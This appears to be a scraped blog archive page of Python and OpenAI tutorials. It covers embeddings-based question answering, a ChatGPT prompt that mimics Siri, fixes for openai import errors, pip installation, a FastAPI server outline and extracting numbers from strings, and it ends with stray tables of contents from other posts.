# Please check out our rate limit guide to learn more on how to handle this: https://platform.openai.com/docs/guides/rate-limits df['embeddings'] = df.text.apply(lambda x: openai.Embedding.create(input=x, engine='text-embedding-ada-002')['data'][0]['embedding'])
df.to_csv('processed/embeddings.csv')
df.head() ################################################################################
### Step 11
################################################################################ df=pd.read_csv('processed/embeddings.csv', index_col=0)
df['embeddings'] = df['embeddings'].apply(eval).apply(np.array) df.head() ################################################################################
### Step 12
################################################################################ def create_context( question, df, max_len=1800, size="ada"
): """ Create a context for a question by finding the most similar context from the dataframe """ # Get the embeddings for the question q_embeddings = openai.Embedding.create(input=question, engine='text-embedding-ada-002')['data'][0]['embedding'] # Get the distances from the embeddings df['distances'] = distances_from_embeddings(q_embeddings, df['embeddings'].values, distance_metric='cosine') returns = [] cur_len = 0 # Sort by distance and add the text to the context until the context is too long for i, row in df.sort_values('distances', ascending=True).iterrows(): # Add the length of the text to the current length cur_len += row['n_tokens'] + 4 # If the context is too long, break if cur_len > max_len: break # Else add it to the text that is being returned returns.append(row["text"]) # Return the context return "\n\n###\n\n".join(returns) def answer_question( df, model="text-davinci-003", question="Am I allowed to publish model outputs to Twitter, without a human review?", max_len=1800, size="ada", debug=False, max_tokens=150, stop_sequence=None
): """ Answer a question based on the most similar context from the dataframe texts """ context = create_context( question, df, max_len=max_len, size=size, ) # If debug, print the raw model response if debug: print("Context:\n" + context) print("\n\n") try: # Create a completions using the questin and context response = openai.Completion.create( prompt=f"Answer the question based on the context below, and if the question can't be answered based on the context, say \"I don't know\"\n\nContext: {context}\n\n---\n\nQuestion: {question}\nAnswer:", temperature=0, max_tokens=max_tokens, top_p=1, frequency_penalty=0, presence_penalty=0, stop=stop_sequence, model=model, ) return response["choices"][0]["text"].strip() except Exception as e: print(e) return "" ################################################################################
### Step 13
################################################################################ print(answer_question(df, question="What day is it?", debug=False)) print(answer_question(df, question="What is our newest embeddings model?"))

How to Run This Code?

This program is a Python script that scrapes text from a website, processes it, and then uses OpenAI’s language models to answer questions based on the scraped text.

All of the following explanations concern the original code project on the GitHub here.

Here’s a step-by-step guide on how to use it:

Install the required packages: The script uses several Python packages, including requests, BeautifulSoup, pandas, and openai. You can install these packages by running pip install -r requirements.txt in the directory where the script is located.
Set the website to scrape: In the script, you can specify the website to scrape by setting the domain and full_url variables in Step 1. The domain variable should be the root domain of the website (e.g., “example.com”), and the full_url variable should be the full URL of the website (e.g., “https://www.example.com/“).
Run the script: You can run the script in a Python environment by executing python script.py in the directory where the script is located.
Wait for the scraping to complete: The script will take some time to scrape the website and save the text files to disk. You can monitor the progress by looking at the console output.
Ask questions: After the scraping is complete, you can use the answer_question function in Step 12 to ask questions based on the scraped text. The function takes in a dataframe containing the scraped text, a question to ask, and several optional parameters. You can modify the question and other parameters to suit your needs.

Note that the script is intended as a demonstration of how to use OpenAI’s language models to answer questions based on scraped text, and may require modification to work with different websites or to answer different types of questions. It also requires an OpenAI API key to use. You can sign up for an API key on the OpenAI website.

What Is an Embedding in This Context?

In natural language processing, an embedding is a way to represent words or phrases as numerical vectors. These vectors capture semantic and contextual information about the words and phrases, and can be used to train machine learning models for various tasks such as text classification, sentiment analysis, and question answering.

In this script, the embeddings are created using OpenAI’s language models, and they are used to encode the text from the scraped web pages into a numerical format that can be analyzed and searched efficiently.

The embeddings are created by feeding the text through OpenAI’s text-embedding-ada-002 engine, which is designed to create high-quality embeddings for a wide variety of text-based applications.

The resulting embeddings are stored in the DataFrame and used to find the most similar context to a question in order to provide accurate and reliable answers.

Recommended: How to Install OpenAI in Python?

If you want to improve your web scraping skills, check out the following course on the Finxter academy:

Posted on March 2, 2023 by sick skills — Leave a comment

How I Built a Virtual Assistant like Siri using ChatGPT Prompting (No Code!)

5/5 – (2 votes)

Siri sucks.

I am a Siri user, and Siri fails me more than it performs for me. It doesn’t understand the chain of commands.

Project Idea: Recreate Siri Using ChatGPT

This got me thinking, “What if I can repurpose ChatGPT to work like Siri?”. So before I tell you how the prompt looks like this is what the chatbot can recognise in the most natural form:

Increase volume
Decrease volume
Play movie
Pause or stop the movie
Open an app
Book a movie or movie ticket
Play song
Book a cab
Call someone
Set a reminder
Send a message
Set an alarm
Open a website
Get directions
Check the weather

To trigger these commands, the user needed to begin the instruction with "Hey Nik".

Let me begin by showing you the most complicated instruction it can handle

Prompt First Trial – Not Perfect Yet

Nik: Assume it's sunny. Hey Nik check the weather for me and if it's sunny book a cab to go to the beach, play song california love by 2Pac ChatGPT: Hey there! The weather today is sunny. Sure, I can check the weather for you and book a cab to the beach if it's sunny. Here are the commands: [WEATHER] [OPENAPP UBER] [PLAYSONG CALIFORNIA LOVE BY 2PAC]

Nik: Assume it’s sunny. Hey Nik check the weather for me and if it’s sunny book a cab to go to the beach, play song california love by 2Pac

ChatGPT: Hey there! The weather today is sunny. Sure, I can check the weather for you and book a cab to the beach if it’s sunny. Here are the commands:

[WEATHER] [OPENAPP UBER] [PLAYSONG CALIFORNIA LOVE BY 2PAC]

Please note that the cab booking will not be completed as this is a simulated environment.

ChatGPT is not aware of my environment hence I had to tell them that it’s sunny. And then I start with "Hey Nik...". In contrast, Google & Siri cannot handle this.

After a good deal of prompt engineering, I came up with the following prompt that could be used by an app to not only detect user meaning but also respond accordingly — without needing to create a single line of code to accomplish this magic!

ChatGPT truly can be used as the heart of many applications — not just to create them!

Final Prompt

You can copy and paste this prompt in case you want to reuse it to build your own Siri replacement:

Nik: I want you to be an interactive chatbot that responds to predefined instructions. The instructions and their respective commands are: Increase volume: [INCREASEVOLUME] Decrease volume: [DECREASEVOLUME] Play movie [MOVIE NAME]: [PLAYMOVIE [MOVIE NAME]] Pause or stop the movie: [STOPMOVIE] Open an app [APP NAME]: [OPENAPP [APP NAME]] Book a movie or movie ticket: [OPENAPP BOOKMYSHOW] Play song [song or artist name]: [PLAYSONG [song or artist name]] Book a cab: [OPENAPP UBER] Call someone [NAME]: [CALL [NAME]] Set a reminder [TIME] [REMINDER]: [SETREMINDER [TIME] [REMINDER]] Send a message [NAME] [MESSAGE]: [SENDMESSAGE [NAME] [MESSAGE]] Set an alarm - [SETALARM [time]] Open a website - [OPEN [website name]] Get directions - [DIRECTIONTO [location]] Check the weather - [WEATHER] Here are some conditions to consider: If the instruction includes a number or percentage when using INCREASEVOLUME or DECREASEVOLUME, append it to the command. If the instruction includes the name of an app when using OPENAPP, append it to the command. To trigger these commands, begin the instruction with "Hey Nik". Please note that commands will be in square brackets, with spaces removed except for messages or names. Your response should contain an acknowledgement in English and below it should be the sequence of commands. After you display the commands do not print anything else.

I came up with the following commands on the first attempt

Increase volume: [INCREASE VOLUME]
Decrease volume: [DECREASEVOLUME]
Play movie [MOVIE NAME]: [PLAYMOVIE [MOVIE NAME]]
Pause or stop the movie: [STOPMOVIE]
Open an app [APP NAME]: [OPENAPP [APP NAME]]
Book a movie or movie ticket: [OPENAPP BOOKMYSHOW]
Play song [song or artist name]: [PLAYSONG [song or artist name]]
Book a cab: [OPENAPP UBER]

After I perfected the results, I wanted to see if ChatGPT could add more commands, so I tried the following prompt

Refinement Prompt

Nik: Can you add more commands in the style given to the prompt. Take inspiration from "ok google" and "hey siri" Please write in English language. ChatGPT: Sure, I can add more commands in the style given to the prompt! Here are some additional commands you can use: To set a reminder, say "Hey Nik, set a reminder for [time] to [task]". For example, "Hey Nik, set a reminder for 2pm to attend a meeting". To check the weather, say "Hey Nik, what's the weather like today?". To get directions, say "Hey Nik, how do I get to [location]?". For example, "Hey Nik, how do I get to Central Park?". To set an alarm, say "Hey Nik, set an alarm for [time]". For example, "Hey Nik, set an alarm for 7am". To send a message, say "Hey Nik, send a message to [contact name]". You will then be prompted to dictate the message and confirm before sending. To open a website, say "Hey Nik, open [website name]". For example, "Hey Nik, open Google". Remember to begin each command with "Hey Nik" for the chatbot to respond. I hope these additional commands are helpful! Nik:Ok now generate the original prompt with the newly added commands Please write in English language.

My Personal Considerations and Findings Using This Prompt

I am impressed with ChatGPT’s ability to generate a more user-friendly and straightforward set of commands. And it also kept modifying my original prompt to include these commands.

But, I realized that there were some conditions that I needed to consider, such as:

If the instruction includes a number or percentage when using INCREASEVOLUME or DECREASEVOLUME, append it to the command.
If the instruction includes the name of an app when using OPENAPP, append it to the command.

With these conditions in mind, I combined the original set of commands with the new commands generated by ChatGPT and added the necessary conditions to create a more comprehensive and user-friendly prompt.

As I developed the chatbot, I discovered that one of its most significant advantages over Siri was its ability to handle an unlimited set of inputs. Siri, on the other hand, works with one command at a time, which can be limiting for users who want to execute multiple tasks in one go.

Here are some examples of user inputs and their respective responses:

User Input: Hey Nik, play movie The Shawshank Redemption Response: [PLAYMOVIE The Shawshank Redemption] User Input: Hey Nik, increase volume by 50 percent Response: [INCREASEVOLUME 50 percent]

User Input: Hey Nik, send a message to John saying I will be there in 10 minutes  Response: [SENDMESSAGE John I will be there in 10 minutes] User Input: Hey Nik, what is the weather like in New York? Response: [WEATHER New York]

Here is an example of the user input and response for the “play song” command:

User input: Hey Nik, play song Shape of You by Ed Sheeran Response: Playing Shape of You by Ed Sheeran Command: [PLAYSONG Shape of You by Ed Sheeran]

And here is an example of the user input and response for the "open an app" command:

User input: Hey Nik, open app Netflix Response: Opening Netflix Command: [OPEN APP NETFLIX]

How to Deploy This

To deploy it as an app, you can use the ChatGPT API + Promptable + Any No Code App Builder, the app can be deployed on iPhone, but there are many permissions that need to be worked out.

A similar version of this may work on Android as it is more open.

Posted on March 1, 2023 by sick skills — Leave a comment

A Simple Hack to Becoming the World’s Best Person in Something as an Average Guy

5/5 – (1 vote)

Millionaires are made at the top of the income distribution.

For example, have a look at the following Pareto distribution exemplifying how only the top sports players make all the money:

If you want to earn a million dollars quickly, you need to become one of the top people in the world at something the market values.

Sounds hard? You don’t actually have the skills to become a top person in a field such as sports, coding, or business?

Don’t worry — becoming one of the best persons at something is actually easy. Everybody can do it — with the right strategy. I call it “skills stacking”. This article explains the simple idea, so let’s get started!

Skills Stacking – Basic Idea

The idea of becoming the best person in the world can be a daunting task, but it’s not an impossible one. Many people believe that to achieve greatness, one must have extraordinary talent or be born with a special gift. However, this is a myth. It’s possible to become the best person in the world by focusing on developing a combination of skills rather than a single skill.

Skill stacking is improving a combination of 6-8 skills individually so that you become one of the top people in your field in the combination of these skills. The combination of skills must all be important in your line of work.

For example, suppose an average guy is in the top 10% of three different skills. In that case, he moves to the top 10% * 10% * 10% = 0.1% in the combination of those three skills. He is the most skilled person out of 1000 randomly chosen persons, in that combination of skills. This means that by becoming merely good in three different areas, an average guy can become one of the best people in his field.

**Example of skill stacking**: Learning seven skills can be enough to become the best out of 1.3 billion people!

In the spreadsheet, a coder focuses on learning

One special skill of this coder is smiling, which they use heavily in their day-to-day work to increase customer satisfaction and create value. Don’t underestimate the simple talents!

The coder may just offer their freelancing services in the area of OpenAI and prompt engineering using Python — and invest their income in the stock market. And they can be wildly successful with this strategy, easily reaching multi-millionaire status!

The concept of going to the top in a combination of skills is simple yet powerful.

How to Stack Skills?

So, how does one go about developing a combination of skills to become the best person in the world?

The first step is to identify the skills you want to develop. These skills should be different but complementary, meaning that they should enhance each other.

For example, if you’re interested in becoming a great public speaker, you might also want to work on your writing skills and your ability to connect with people.

Once you have identified the skills you want to develop, the next step is to start practicing. This requires dedication, hard work, and a willingness to learn from your mistakes.

However, it’s not so hard to reach the top 10% or so in a skill — just read a couple of books about this skill and you have done more than most people ever will!

A Few Words on Persistence

Another essential factor in becoming the best person in the world is persistence. Success is rarely achieved overnight, and setbacks are inevitable. However, those who are persistent and keep pushing through their failures are the ones who ultimately succeed. As the saying goes, “practice makes perfect,” and the more you practice, the better you become.

In addition to developing a combination of skills and persistence, it’s also essential to seek out opportunities to showcase your skills. Whether it’s through public speaking engagements, writing articles, or participating in competitions, putting yourself out there is crucial to becoming the best person in the world. This not only helps you gain recognition for your skills but also helps you learn from others and grow as a person.

Conclusion

In conclusion, becoming the best person in the world as an average guy is possible. It requires a combination of skills, persistence, and the willingness to take risks and put yourself out there.

By focusing on developing a variety of skills, an average guy can move to the top of his chosen field and become one of the best people in the world.

Action Steps: Identify the skills you want to develop, put in the time and effort required, and don’t give up.

Who knows, you might just end up surprising yourself and the world!

Bonus – Exponential Skill Stacking

A great way to increase your odds is to stack “exponential skills”, i.e., skills that become exponentially more demanded yearly.

Programming
Blockchain Development
Machine Learning
ChatGPT and OpenAI
Freelancing

By stacking these skills, your stack becomes more valuable over time, not less. You can master many exponential skills at the Finxter academy:

Posted on February 28, 2023 by sick skills — Leave a comment

ModuleNotFoundError: No Module Named OpenAI

5/5 – (1 vote)

Quick Fix: Python raises the ImportError: No module named 'openai' when it cannot find the library openai. The most frequent source of this error is that you haven’t installed openai explicitly with pip install openai. Alternatively, you may have different Python versions on your computer, and openai is not installed for the particular version you’re using.

Before I dive into the tutorial, try out one of the following solutions (quick fix):

# ✅ Python 2 or Virtual Environment pip install openai # ✅ Python 3
pip3 install openai # ✅ Python 3.10
pip3.10 install openai # ✅ If you get a Permission Error
sudo pip3 install openai # ✅ If pip is not in your PATH environment variable
python -m pip install openai # ✅ Python 3 if pip is not in your PATH
python3 -m pip install openai # ✅ Python 3.10 if pip is not in your PATH
python3.10 -m pip install openai # ✅ Anaconda
conda install -c conda-forge openai

Problem Formulation

You’ve just learned about the awesome capabilities of the openai library and you want to try it out, so you start your code with the following statement:

import openai

This is supposed to import the OpenAI library into your (virtual) environment. However, it only throws the following ImportError: No module named 'openai':

>>> import openai
Traceback (most recent call last): File "<pyshell#6>", line 1, in <module> import openai
ModuleNotFoundError: No module named 'openai'

Solution Idea 1: Install Library OpenAI

The most likely reason is that Python doesn’t provide openai in its standard library. You need to install it first!

Before being able to import the OpenAI module, you need to install it using Python’s package manager pip. Make sure pip is installed on your machine.

To fix this error, you can run the following command in your Windows shell:

$ pip install openai

This simple command installs openai in your virtual environment on Windows, Linux, and MacOS. It assumes that your pip version is updated. If it isn’t, use the following two commands in your terminal, command line, or shell (there’s no harm in doing it anyways):

$ python -m pip install --upgrade pip
$ pip install openai

Note: Don’t copy and paste the $ symbol. This just illustrates that you run it in your shell/terminal/command line.

Solution Idea 2: Fix the Path

The error might persist even after you have installed the openai library. This likely happens because pip is installed but doesn’t reside in the path you can use. Although pip may be installed on your system the script is unable to locate it. Therefore, it is unable to install the library using pip in the correct path.

To fix the problem with the path in Windows follow the steps given next.

Step 1: Open the folder where you installed Python by opening the command prompt and typing where python

Step 2: Once you have opened the Python folder, browse and open the Scripts folder and copy its location. Also verify that the folder contains the pip file.

Step 3: Now open the Scripts directory in the command prompt using the cd command and the location that you copied previously.

Step 4: Now install the library using pip install openai command. Here’s an analogous example:

After having followed the above steps, execute our script once again. And you should get the desired output.

Understanding the “import” Statement

import openai

In Python, the import statement serves two main purposes:

Search the module by its name, load it, and initialize it.
Define a name in the local namespace within the scope of the import statement. This local name is then used to reference the accessed module throughout the code.

What’s the Difference Between ImportError and ModuleNotFoundError?

What’s the difference between ImportError and ModuleNotFoundError?

Python defines an error hierarchy, so some error classes inherit from other error classes. In our case, the ModuleNotFoundError is a subclass of the ImportError class.

You can see this in this screenshot from the docs:

You can also check this relationship using the issubclass() built-in function:

>>> issubclass(ModuleNotFoundError, ImportError)
True

Specifically, Python raises the ModuleNotFoundError if the module (e.g., openai) cannot be found. If it can be found, there may be a problem loading the module or some specific files within the module. In those cases, Python would raise an ImportError.

If an import statement cannot import a module, it raises an ImportError. This may occur because of a faulty installation or an invalid path. In Python 3.6 or newer, this will usually raise a ModuleNotFoundError.

How to Fix “ModuleNotFoundError: No module named ‘openai’” in PyCharm

If you create a new Python project in PyCharm and try to import the openai library, it’ll raise the following error message:

Traceback (most recent call last): File "C:/Users/.../main.py", line 1, in <module> import openai
ModuleNotFoundError: No module named 'openai' Process finished with exit code 1

The reason is that each PyCharm project, per default, creates a virtual environment in which you can install custom Python modules. But the virtual environment is initially empty—even if you’ve already installed openai on your computer!

Here’s a screenshot exemplifying this for the pandas library. It’ll look similar for openai.

The fix is simple: Use the PyCharm installation tooltips to install OpenAI in your virtual environment—two clicks and you’re good to go!

First, right-click on the openai text in your editor:

Second, click “Show Context Actions” in your context menu. In the new menu that arises, click “Install OpenAI” and wait for PyCharm to finish the installation.

The code will run after your installation completes successfully.

As an alternative, you can also open the Terminal tool at the bottom and type:

$ pip install openai

If this doesn’t work, you may want to set the Python interpreter to another version using the following tutorial: https://www.jetbrains.com/help/pycharm/2016.1/configuring-python-interpreter-for-a-project.html

You can also manually install a new library such as openai in PyCharm using the following procedure:

Open File > Settings > Project from the PyCharm menu.
Select your current project.
Click the Python Interpreter tab within your project tab.
Click the small + symbol to add a new library to the project.
Now type in the library to be installed, in your example OpenAI, and click Install Package.
Wait for the installation to terminate and close all popup windows.

Here’s an analogous example:

Here’s a full guide on how to install a library on PyCharm.

How to Install a Library on PyCharm

Posted on February 27, 2023 by sick skills — Leave a comment

How to Install Pip? 5 Easy Steps

5/5 – (1 vote)

In this article, I’ll quickly guide you through the installation steps for Python’s package installer pip. But first things first:

What Is Pip?

pip is the package installer for Python used to install and manage software packages (also known as libraries or modules) written in Python. pip makes it easy to install, upgrade, and uninstall packages in your Python environment.

When you install a package with pip, it automatically downloads and installs any dependencies required by the package, making it very convenient for managing your Python projects. You can use pip from the command line but it also integrates with popular development environments like Jupyter, PyCharm, and Visual Studio Code.

Is Pip Already Included in Python?

pip is included with Python distributions from version 3.4 onwards, so if you have a recent version of Python installed, you should already have pip.

Recommended: How to Check Your Python Version?

If you don’t have pip installed, you can easily install it using the steps outlined as follows:

5 Steps to Install Pip Easily

To install pip in Python, follow these steps:

Check if pip is already installed by running the command “pip -V” in your command prompt or terminal. If you see a version number, pip is already installed. If not, proceed to step 2.

Download the get-pip.py script from the official Python website (see below).
Open a command prompt or terminal and navigate to the directory where you downloaded the get-pip.py script.
Run the command python get-pip.py to install pip.
Verify that pip is installed by running the command pip -V.

That’s it! You should now have pip installed and ready to use in your Python environment.

In case you weren’t able to complete step 2, here’s how to do it quickly:

How to Download get-pip.py from Official Python?

To download the get-pip.py script from the official Python website, follow these steps:

Open a web browser and go to the following URL: https://bootstrap.pypa.io/get-pip.py
Right-click on the page and select “Save As” (or similar option) to download the file.
Choose a directory to save the file to and click “Save”.
Once the download is complete, navigate to the directory where you saved the file.

Alternatively, you can use the following command in your command prompt or terminal to download the file directly:

curl https://bootstrap.pypa.io/get-pip.py -o get-pip.py

This will download the get-pip.py file to your current working directory.

Are There Other Ways to Install Pip?

Yes, there are a few other ways to install pip depending on your operating system and Python distribution.

Here are the three most common methods:

Package managers: Many Linux distributions include pip in their package repositories, which means you can use your distribution’s package manager to install it. For example, on Ubuntu, you can use the following command: sudo apt-get install python-pip.
Python installers: Some Python distributions come with pip pre-installed, such as Anaconda and ActivePython. If you are using one of these distributions, you should already have pip installed.
Python package installer: Another way to install pip is by using the ensurepip module, which is included with Python since version 3.4. You can use the following command: python -m ensurepip --default-pip.

Regardless of the method you choose, it’s always a good idea to verify that pip is installed and working correctly by running the command pip -V.

How to Upgrade Pip?

To upgrade pip to the latest version, follow these steps:

Step 1: Open a command prompt or terminal and enter the following command to upgrade pip:

python -m pip install --upgrade pip

The previous command was for Linux or macOS. For Windows, you may want to use:

 py -m pip install --upgrade pip

Step 2: Depending on your system configuration, you may need to run this command with administrator privileges. On Linux or macOS, you can use sudo to run the command as root, like this:

sudo python -m pip install --upgrade pip

Step 3: pip will download and install the latest version of itself. Once the upgrade is complete, you can verify that pip is up to date by running the command:

pip --version

This will display the version number of the newly installed pip.

That’s it! You should now have the latest version of pip installed on your system.

Note that it’s a good idea to keep pip up to date to take advantage of bug fixes, security updates, and new features. You can check for updates to individual packages installed with pip using the pip list --outdated command, and upgrade them with pip install --upgrade <package>.

Recommended: Pip Commands — The Ultimate Guide

Posted on February 26, 2023 by sick skills — Leave a comment

BrainWaves P2P Social Network – How I Created a Basic Server

5/5 – (1 vote)

Welcome back to the Brainwaves P2P project, or at least my take on it :-).

The previous article was a theoretical explanation of how I envision this project. It is now time to start laying the groundwork!

I learn as I go…

As some of you might have guessed already, I’m a completely self-taught coder. Because of that, I’m sure many professionals might not agree with how I code.

I accept that and will welcome any constructive criticism. I have been learning non-stop since I started this project. I assume this will not slow down anytime soon. YouTube is my main source of knowledge as I learn best when seeing something done. I am, in other words, a visual learner. I found an article that explains it well here.

Articles on various sites are the other half of how I learn new concepts in coding. That is how I found Finxter :-).

So to sum it up, my code is far from perfect, and I will never claim it is. This is my take on trying to solve this puzzle. I actually look forward to alternative approaches!

You can open issues on my GitHub if you want to address something.

Now that we all know where we stand let us dive right in! How to build a server for our peer-to-peer social network app?

Flask vs FastAPI

In the previous article, I mentioned that I want to use FastAPI to build the relay server, as opposed to Flask. As I have done before and will do again, I asked ChatGPT about the differences between Flask and FastAPI.

 Flask vs FastAPI Flask is based on the Werkzeug WSGI (Web Server Gateway Interface) toolkit, which is synchronous by default. However, Flask can still be used to build asynchronous applications. You will need to use a third-party library like gevent or asyncio. With these libraries, Flask can use coroutines and event loops to handle I/O operations asynchronously. FastAPI, on the other hand, is designed to be fully asynchronous from the ground up. It uses the async/await syntax of Python to write asynchronous code. It is based on the ASGI (Asynchronous Server Gateway Interface) specification. FastAPI uses the Starlette framework as its foundation. the framework provides a high-performance event loop and asynchronous request handlers.

Both the speed and the asynchrony determined my choice for FastAPI.

Those of you familiar with Flask will know about its built-in development server. As FastAPI doesn’t have this, we’ll need to install a separate server.

Uvicorn Server

This is where I encountered my first small hiccup. I code on Windows (I know, sue me ), and I wanted to use Uvicorn. As this only runs on Linux, I needed to get it to function in WSL.

I’ll not go into all the details here, but I could write something about it if anyone has an interest in it. Let me know!

After getting Uvicorn to function as it should, we can continue. It is important to remember that the Python interpreter on WSL does not share anything with its Windows counterpart. This means that you either need two separate virtual environments or that you install pip packages for each OS.

Creating Basic FastAPI App

Once all this annoying prep work is done, creating a basic FastAPI app is very easy. We first import FastAPI as below:

from fastapi import FastAPI

All you need to do afterward is define the basic app and create an endpoint.

#---APP INIT---#
app = FastAPI() @app.get("/")
async def root(): return {"message": "Hello World"}

To get this to run, you need to navigate to the working directory of your FastAPI project via WSL. Afterward, you call the Uvicorn server. The command below assumes you called your Python file main.py!

uvicorn main:app --reload

I usually run the Uvicorn server in a separate terminal instance of WSL.

That way, I can leave it on and test any changes I make immediately. Later, when I’ll be working on the client also, I can split the terminal. You can then make API calls through the client terminal window. FastAPI’s response in the server WSL window is then visible immediately.

Receiving “Hello World” from Server

If you now navigate to 127.0.0.1:8000 you should get a JSON response with the "Hello World" we returned in the endpoint above. We will change this endpoints function later, but for now, it works to prove our API is working.

For the API server, I have the following layout in mind. It might change throughout the development process. I currently foresee two endpoints that do not require the user to be logged in with a JWT token. The first will be to get that token, and the second to register a new user. Everything else will require the user to be authenticated.

I stated earlier that I would change the root’s endpoint function. Its new role is now to allow a user to request a JWT token. The token is only granted after providing a correct combination of username and password. This requires a dedicated set of both helper functions and Pydantic models to work.

I will go into this in another article, as it requires much explaining :-). It was something I am still learning myself.

Endpoint Layout

The current layout of my endpoints at a high level is the following:

#---OPEN ENDPOINTS---# #Root route to get token
@app.post("/", response_model=Token) #Route to create a new user
@app.post("/api/v1/users") #---AUTH ENDPOINTS---# #Route to get all current users and their attributes(development only)
@app.get("/api/v1/users") #Route to test if the token is valid, used while authenticating
@app.get("/api/v1/token-test") #Route to get all thoughts/messages created by a certain user
@app.get("/api/v1/thoughts/{username}") #Route to return all thoughts/messages containing the query string
@app.get("/api/v1/thoughts/{query_str}") #Route to create a new message/thought
@app.post("/api/v1/thoughts") #Route to return all info about the current user(like a user profile)
@app.get("/api/v1/me", response_model=User)

The current setup should allow for the barebones functionality of the application. At least from a server point of view. The routes above and/or their function are liable to change during development. I do find it helps to have a visual reminder of what I am working toward. That is why I created the high-level outlay. As you might recall, I am a visual learner .

Database Considerations

I will dedicate the last part of this article to the database part. As we need to store both users, user credentials, and messages/tweets somewhere, a database is a must.

If you have read any of my previous articles, you will know I like Deta a lot.

Their NoSQL databases work great for development. They recently evolved into Deta Space. This change makes their ecosystem even more interesting for developers. The fact that they are free is also important for a single developer coding this app on his own time . Make sure to check them out!

The next article will focus on both the database code and the Pydantic models we will need to get our API to function.

As always, feel free to ask me questions or pass suggestions! And check out the GitHub repository for participation!

GitHub: https://github.com/shandralor/PeerBrain

Posted on February 24, 2023 by sick skills — Leave a comment

How To Extract Numbers From A String In Python?

5/5 – (4 votes)

The easiest way to extract numbers from a Python string s is to use the expression re.findall('\d+', s). For example, re.findall('\d+', 'hi 100 alice 18 old 42') yields the list of strings ['100', '18', '42'] that you can then convert to numbers using int() or float().

There are some tricks and alternatives, so keep reading to learn about them.

In particular, you’ll learn about the following methods to extract numbers from a given string in Python:

Use the regex module.
Use split() and append() functions on a list.
Use a List Comprehension with isdigit() and split() functions.
Use the num_from_string module.

Problem Formulation

Extracting digits or numbers from a given string might come up in your coding journey quite often. For instance, you may want to extract certain numerical figures from a CSV file, or you need to separate complex digits and figures from given patterns.

Having said that, let us dive into our mission-critical question:

Problem: Given a string. How to extract numbers from the string in Python?

Example: Consider that you have been given a string and you want to extract all the numbers from the string as given in the following example:

Given is the following string:

s = 'Extract 100, 1000 and 10000 from this string'

This is your desired output:

[100, 1000, 10000]

Let us discuss the methods that we can use to extract the numbers from the given string:

Method 1: Using Regex Module

The most efficient approach to solving our problem is to leverage the power of the re module. You can easily use Regular Expressions (RegEx) to check or verify if a given string contains a specified pattern (be it a digit or a special character, or any other pattern).

Thus to solve our problem, we must import the regex module, which is already included in Python’s standard library, and then with the help of the findall() function we can extract the numbers from the given string.

◈ Learn More: re.findall() is an easy-to-use regex function that returns a list containing all matches. To learn more about re.findall() check out our blog tutorial here.

Let us have a look at the following code to understand how we can use the regex module to solve our problem:

import re sentence = 'Extract 100 , 100.45 and 10000 from this string'
s = [float(s) for s in re.findall(r'-?\d+\.?\d*', sentence)]
print(s)

Output

[100.0, 100.45, 10000.0]

This is a Python code that uses the re module, which provides support for regular expressions in Python, to extract numerical values from a string.

Code explanation:

The line s = [float(s) for s in re.findall(r'-?\d+\.?\d*', sentence)] uses the re.findall() function from the re module to search the sentence string for numerical values.

Specifically, it looks for strings of characters that match the regular expression pattern r'-?\d+.?\d*'. This pattern matches an optional minus sign, followed by one or more digits, followed by an optional decimal point, followed by zero or more digits.

The re.findall() function returns a list of all the matching strings.

The list comprehension [float(s) for s in re.findall(r'-?\d+\.?\d*', sentence)] takes the list of matching strings returned by findall and converts each string to a floating-point number using the float() function. This resulting list of floating-point numbers is then assigned to the variable s.

Recommended: Python List Comprehension

Method 2: Split and Append The Numbers To A List using split() and append()

Another workaround for our problem is to split the given string using the split() function and then extract the numbers using the built-in float() method then append the extracted numbers to the list.

Note:

split() is a built-in python method which is used to split a string into a list.
append() is a built-in method in python that adds an item to the end of a list.

Now that we have the necessary tools to solve our problem based on the above concept let us dive into the code to see how it works:

sentence = 'Extract 100 , 100.45 and 10000 from this string' s = []
for t in sentence.split(): try: s.append(float(t)) except ValueError: pass
print(s)

Output

[100.0, 100.45, 10000.0]

Method 3: Using isdigit() Function In A List Comprehension

Another approach to solving our problem is to use the isdigit() inbuilt function to extract the digits from the string and then store them in a list using a list comprehension.

The isdigit() function is used to check if a given string contains digits. Thus if it finds a character that is a digit, then it returns True. Otherwise, it returns False.

Let us have a look at the code given below to see how the above concept works:

sentence = 'Extract 100 , 100.45 and 10000 from this string'
s = [int(s) for s in str.split(sentence) if s.isdigit()]
print(s)

Output

[100, 10000]

Alert! This technique is best suited to extract only positive integers. It won’t work for negative integers, floats, or hexadecimal numbers.

Method 4: Using Numbers from String Library

This is a quick hack if you want to avoid spending time typing explicit code to extract numbers from a string.

You can import a library known as nums_from_string and then use it to extract numbers from a given string. It contains several regex rules with comprehensive coverage and can be a very useful tool for NLP researchers.

Since the nums_from_string library is not a part of the standard Python library, you have to install it before use. Use the following command to install this useful library:

pip install nums_from_string

The following program demonstrates the usage of nums_from_string :

import nums_from_string sentence = 'Extract 100 , 100.45 and 10000 from this string'
print(nums_from_string.get_nums(sentence))

Output

[100.0, 100.45, 10000.0]

Conclusion

Thus from the above discussions, we found that there are numerous ways of extracting a number from a given string in python.

My personal favorite, though, would certainly be the regex module re.

You might argue that using other methods like the isdigit() and split() functions provide simpler and more readable code and faster. However, as mentioned earlier, it does not return numbers that are negative (in reference to Method 2) and also does not work for floats that have no space between them and other characters like '25.50k' (in reference to Method 2).

Furthermore, speed is kind of an irrelevant metric when it comes to log parsing. Now you see why regex is my personal favorite in this list of solutions.

If you are not very supportive of the re library, especially because you find it difficult to get a strong grip on this concept (just like me in the beginning), here’s THE TUTORIAL for you to become a regex master.

I hope you found this article useful and added some value to your coding journey. Please stay tuned for more interesting stuff in the future.

Life Forces #1 – Survival, Enjoyment of Life, Life Extension

Life Forces #2 – Comfortable Living Conditions

Life Forces #3 – To Be Superior and Winning

Life Forces #4 – Sexual Companionship

Life Forces #5 – Freedom From Fear, Pain, and Danger

Life Forces #6 – Care And Protection of Loved Ones

Life Forces #7 – Social Approval

Conclusion

CHALLENGE OVERVIEW

BACKGROUND

ENUMERATION/RECON

STEP 1

STEP 2

STEP 3

STEP 4

STEP 5

STEP 6

STEP 7

INITIAL FOOTHOLD

LOCAL RECON

LOCATE THE SECOND FLAG

CHECK SUDO PERMISSIONS

EXPLOIT/PRIVILEGE ESCALATION

GRAB THE THIRD FLAG

POST-EXPLOITATION – BREAK OUT OF THE DOCKER CONTAINER

FINAL THOUGHTS

Problem Formulation

Method 1: Using Notepad

Method 2: Pure CMD Approach

Method 3: Change File Purely In CMD (Copy Con)

Method 4: If you SSH’d to a Unix Machine

Summary

Overview

Step 1

Step 2

Step 3

Step 4

Step 5

Step 6
